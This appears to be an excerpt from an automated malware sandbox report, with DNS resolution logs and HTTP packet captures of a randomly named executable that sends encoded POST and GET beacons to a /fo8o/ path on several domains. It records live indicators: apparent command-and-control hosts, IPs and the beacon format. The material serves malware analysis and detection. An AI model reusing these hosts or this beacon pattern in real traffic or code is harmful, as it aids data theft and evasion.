                                                                                    Jan 8, 2025 15:01:26.768699884 CET1.1.1.1192.168.2.50xce56No error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:01:40.443769932 CET1.1.1.1192.168.2.50xa944Name error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:01:48.659955978 CET1.1.1.1192.168.2.50x76c9No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:02.050198078 CET1.1.1.1192.168.2.50xb719No error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:02.050198078 CET1.1.1.1192.168.2.50xb719No error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:15.436481953 CET1.1.1.1192.168.2.50xd8b7Name error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:23.847479105 CET1.1.1.1192.168.2.50xc7a1Name error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:31.953454971 CET1.1.1.1192.168.2.50x4046No error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:31.953454971 CET1.1.1.1192.168.2.50x4046No error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:45.371803999 CET1.1.1.1192.168.2.50x48b0Name error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:53.442931890 CET1.1.1.1192.168.2.50xb899Name error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:03:02.604357004 CET1.1.1.1192.168.2.50x1157Name error (3)www.shenzhoucui.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:03:02.607907057 CET1.1.1.1192.168.2.50x1157Name error (3)www.shenzhoucui.comnonenoneA (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.3xfootball.com
                                                                                    • www.goldenjade-travel.com
                                                                                    • www.magmadokum.com
                                                                                    • www.rssnewscast.com
                                                                                    • www.techchains.info
                                                                                    • www.elettrosistemista.zip
                                                                                    • www.empowermedeco.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.549767154.215.72.110803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 14:59:27.006340981 CET515OUTGET /fo8o/?Dvh=YnI07v&Ubhdm=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.3xfootball.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 8, 2025 14:59:27.901184082 CET691INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Wed, 08 Jan 2025 13:59:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 548
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.549919116.50.37.244803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 14:59:51.427485943 CET801OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Origin: http://www.goldenjade-travel.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d
                                                                                    Data Ascii: Ubhdm=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
                                                                                    Jan 8, 2025 14:59:52.317792892 CET492INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Wed, 08 Jan 2025 13:59:51 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.549939116.50.37.244803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 14:59:53.955218077 CET821OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Origin: http://www.goldenjade-travel.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 48 69 45 6d 77 72 59 70 37 6d 4c 31 38 6b 36 41 73 61 6a 77 35 2b 79 65 78 79 78 34 52 73 72 55 72 4f 70 64 44 34
                                                                                    Data Ascii: Ubhdm=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHiEmwrYp7mL18k6Asajw5+yexyx4RsrUrOpdD4
                                                                                    Jan 8, 2025 14:59:54.832896948 CET492INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Wed, 08 Jan 2025 13:59:54 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.549951116.50.37.244803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 14:59:56.691610098 CET1838OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Origin: http://www.goldenjade-travel.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 32 4e 5a 54 68 6e 6e 4c 6d 38 30 4d 2f 75 45 57 32 34 4a 38 33 59 2f 75 7a 5a 41 38 72 41 79 36 5a 78 35 31 77 37 47 6f 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 78 4e 46 47 67 41 5a 64 49 78 6b 61 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a [TRUNCATED]
                                                                                    Data Ascii: Ubhdm=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL2NZThnnLm80M/uEW24J83Y/uzZA8rAy6Zx51w7GoYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldxNFGgAZdIxkafgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB3wpOPRMSckz22D7oIJ1pT3kmt5OAzJQX0rpd4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7r8VUpMLRkY6c3P8G0fpnTUDkLQscQKtCpBC0WjC/PZq9AVPUPhBBD5/Dig7vxPgCc2pVcvipTzijVIvgKAdFC7i2pC8gbNWoNVRZMX415Goc9ACqxlKDTbGvtkaduGagDzKCszB0YP2v04KI092MQf7ousTmtftOjO7F0nipoP+ae415ShjaJt52G5Y6AFhRSUFLstJAda1ItR8M9j/L3g9nYAAaYrZcsa4vZMQvEH+ZAtHeztq24kQbanf5ovMXFmxG2hPDmBOxYxWsGXxwqxAE4UChtzmKyovtMK56OZLEgKSJviIqU3z0dUvGszLNpCkWZsAqG3JpcHhuqqwQv6sb+TG8VHQhAkXO4dCk+vc59h2hhsQCETtYQj2hDGYgZtAbx5kvk5+K7Gl1SaKXYmnS6DbpM5fRwWGzllkVCSq+ddNwmCqpgcn42aU+9x/xCJsUgMK3AP/fEJ4db0U1RRo7K/TxrU/5+U+u6hHJplkdFUrMBIcY0SOK4eWxpJ3wpdR7JATPJiykjxVF [TRUNCATED]
                                                                                    Jan 8, 2025 14:59:57.561166048 CET492INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Wed, 08 Jan 2025 13:59:57 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.549967116.50.37.244803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 14:59:59.222978115 CET522OUTGET /fo8o/?Dvh=YnI07v&Ubhdm=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 8, 2025 15:00:00.101052999 CET492INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Wed, 08 Jan 2025 13:59:59 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.54998185.159.66.93803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:00:13.381917000 CET780OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.magmadokum.com
                                                                                    Origin: http://www.magmadokum.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.magmadokum.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 48 43 46 59 72 4d 39 61 51 75 33 56 78 63 4f 51 38 59 6d 39 5a 44 32 48 32 7a 46 43 44 33 67 72 48 6b 72 34 47 4d 3d
                                                                                    Data Ascii: Ubhdm=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0HCFYrM9aQu3VxcOQ8Ym9ZD2H2zFCD3grHkr4GM=


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.54998285.159.66.93803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:00:15.923553944 CET800OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.magmadokum.com
                                                                                    Origin: http://www.magmadokum.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.magmadokum.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
